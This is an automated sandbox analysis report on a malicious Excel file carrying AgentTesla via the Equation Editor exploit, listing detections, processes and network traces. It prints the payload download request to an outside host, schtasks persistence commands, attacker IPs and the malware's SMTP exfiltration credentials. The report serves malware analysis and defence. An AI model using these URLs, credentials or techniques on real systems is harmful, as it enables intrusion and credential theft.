Loading ...

Play interactive tourEdit tour

Windows Analysis Report Doc2.xlsx

Overview

General Information

Sample Name:Doc2.xlsx
Analysis ID:452692
MD5:7848697a2cff990710c69e8d97e55c13
SHA1:9af272f7dedd808c48b03d98d7eb75356b74f6ee
SHA256:ef17f47bcdb067d712661ddadff8ebee2924282c7fe21edd237e8094cc4ebdb0
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large strings
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2392 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2264 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2964 cmdline: 'C:\Users\Public\vbc.exe' MD5: 6733D5E8934EAFF7C0087E7DE2C8E62A)
      • schtasks.exe (PID: 2172 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • vbc.exe (PID: 2148 cmdline: {path} MD5: 6733D5E8934EAFF7C0087E7DE2C8E62A)
  • MLdAu.exe (PID: 1796 cmdline: 'C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe' MD5: 6733D5E8934EAFF7C0087E7DE2C8E62A)
    • schtasks.exe (PID: 1984 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • MLdAu.exe (PID: 2052 cmdline: {path} MD5: 6733D5E8934EAFF7C0087E7DE2C8E62A)
  • MLdAu.exe (PID: 3036 cmdline: 'C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe' MD5: 6733D5E8934EAFF7C0087E7DE2C8E62A)
    • schtasks.exe (PID: 1440 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • MLdAu.exe (PID: 1068 cmdline: {path} MD5: 6733D5E8934EAFF7C0087E7DE2C8E62A)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "account@jiqdyi.com", "Password": "Emotion22", "Host": "mail.spamora.net"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.2.MLdAu.exe.328e310.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              12.2.MLdAu.exe.328e310.3.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                11.2.MLdAu.exe.30ee310.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  11.2.MLdAu.exe.30ee310.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    6.2.vbc.exe.340e310.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 13 entries

                      Sigma Overview

                      Exploits:

                      barindex
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.26.106.165, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2264, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2264, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2264, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2964
                      Sigma detected: Execution from Suspicious FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2264, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2964

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://arkemagrup.com/Doc_87654334567.exeAvira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 11.2.MLdAu.exe.30ee310.3.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "account@jiqdyi.com", "Password": "Emotion22", "Host": "mail.spamora.net"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exeReversingLabs: Detection: 13%
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeReversingLabs: Detection: 13%
                      Source: C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exeReversingLabs: Detection: 13%
                      Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 13%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Doc2.xlsxReversingLabs: Detection: 28%

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: .pDBl source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp
                      Source: global trafficDNS query: name: arkemagrup.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.26.106.165:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.26.106.165:80
                      Source: excel.exeMemory has grown: Private usage: 4MB later: 68MB
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.26.106.194:587
                      Source: Joe Sandbox ViewIP Address: 185.26.106.194 185.26.106.194
                      Source: Joe Sandbox ViewIP Address: 185.26.106.165 185.26.106.165
                      Source: Joe Sandbox ViewASN Name: ATE-ASFR ATE-ASFR
                      Source: Joe Sandbox ViewASN Name: ATE-ASFR ATE-ASFR
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.26.106.194:587
                      Source: global trafficHTTP traffic detected: GET /Doc_87654334567.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: arkemagrup.comConnection: Keep-Alive
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38D6D8CE.emfJump to behavior
                      Source: global trafficHTTP traffic detected: GET /Doc_87654334567.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: arkemagrup.comConnection: Keep-Alive
                      Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: arkemagrup.com
                      Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpString found in binary or memory: http://BGwprh.com
                      Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                      Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: vbc.exe, 00000009.00000002.2370164417.00000000008CD000.00000004.00000020.sdmp, vbc.exe, 00000009.00000003.2293255125.0000000006170000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpString found in binary or memory: http://mail.spamora.net
                      Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0%
                      Source: vbc.exe, 00000006.00000002.2235845813.000000000B8F0000.00000002.00000001.sdmp, vbc.exe, 00000009.00000002.2375831529.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: vbc.exe, 00000009.00000002.2382948268.0000000008610000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: vbc.exe, 00000006.00000002.2235845813.000000000B8F0000.00000002.00000001.sdmp, vbc.exe, 00000009.00000002.2375831529.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpString found in binary or memory: https://login.blockchain.com/HD?m
                      Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpString found in binary or memory: https://login.blockchain.com/ObjectLengthChainingModeGCMAuthTagLengthChainingModeKeyDataBlobAESMicro
                      Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: vbc.exe, 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: C:\Users\Public\vbc.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      .NET source code contains very large stringsShow sources
                      Source: vbc.exe.4.dr, Utilities/UI.Controls/Design/YaTabControlDesigner.csLong String: Length: 32771
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exeJump to dropped file
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_00318C20
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_00311068
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003178A9
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031D488
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031AD50
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003171E8
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_00319DE8
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_00319391
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031BC18
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031BC08
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031AC5F
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031D040
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_00318088
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031CDE8
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031EE28
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031EE18
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031F2B1
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031D2A0
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031F2C0
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031DFB4
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031C790
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_00318B80
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031FB88
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B2168
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B1758
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B0638
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B1A08
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B0048
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B0040
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B2159
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B2558
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B1749
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B2549
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B37A9
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B35A0
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B05F9
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B19F8
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B31F4
                      Source: C:\Users\Public\vbc.exeCode function: 9_2_00325928
                      Source: C:\Users\Public\vbc.exeCode function: 9_2_00325C70
                      Source: C:\Users\Public\vbc.exeCode function: 9_2_00326540
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E8C20
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E78A9
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E00B0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002ED488
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E71E8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E9DE8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EB361
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E9391
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EBC08
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E8C1B
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EBC18
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002ED040
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E8088
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E08E8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EE4CC
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002ECDE8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EEE28
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EEE18
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002ED2A0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EF2B1
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EF2C0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EC790
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D21758
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D220E0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D22E38
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D219F8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D205F9
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D22B51
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D23518
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D23721
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D224D0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D224C0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D20048
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D21A08
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D20638
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D2E38
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D5892
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D20E0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D1758
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D1A08
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D0006
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D0638
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D0048
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D20D1
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D24D0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D24C0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D3518
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D3721
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D1749
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D316C
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D59DA
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D05F9
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D19F8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_00278C20
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_002778A9
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_002700B0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027D488
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027AD50
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_002771E8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_00279DE8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_00279391
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027BC08
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027BC18
